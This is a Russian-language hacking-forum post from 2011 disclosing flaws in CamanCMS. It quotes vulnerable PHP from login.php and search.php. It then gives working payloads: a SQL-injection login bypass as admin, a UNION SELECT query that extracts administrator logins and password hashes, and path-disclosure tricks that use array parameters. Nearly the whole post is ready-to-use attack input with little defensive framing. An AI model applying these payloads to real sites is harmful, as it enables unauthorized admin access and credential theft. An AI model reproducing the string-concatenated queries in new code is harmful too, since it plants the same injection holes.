Prev Предыдущее сообщение   Следующее сообщение Next
Старый 07.02.2011, 20:58   #1
Krist
 
Регистрация: 30.01.2011
Сообщений: 13
Репутация: 11
По умолчанию CamanCMS

CamanCMS


sql-inj (Заходим под админом)
login.php
PHP код:
// ...
if($_GET["do"] == "login")
    {
    
$login htmlspecialchars($_POST["login"]); 
    
$password md5(htmlspecialchars($_POST["password"])); 
        
        
$query_user = @mysql_query("SELECT * FROM ".$pref."users WHERE login='".$login."' AND password='".$password."' LIMIT 1");
// ... 
Код:
Login: admin' -- 
Password: любой

sql-inj
search.php
PHP код:
// ...
$search htmlspecialchars($_POST["search"]);

$query_search = @mysql_query("SELECT * FROM ".$pref."news WHERE short_news LIKE '%$search%' OR full_news LIKE '%$search%'"); 
// ... 
Код:
В поле поиска вводим: ' union select 1,2,concat_ws(0x3b,login,password),4,5,6,7,8 from users where admin=1--
Раскрытие путей
Из-за htmlspecialchars в search.php (код выше)
Код:
http://localhost/search/
POST: search[]
2.
Код:
И в login.php
POST:login[]
Krist вне форума   Ответить с цитированием
 

Метки
уязвимости camancms

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot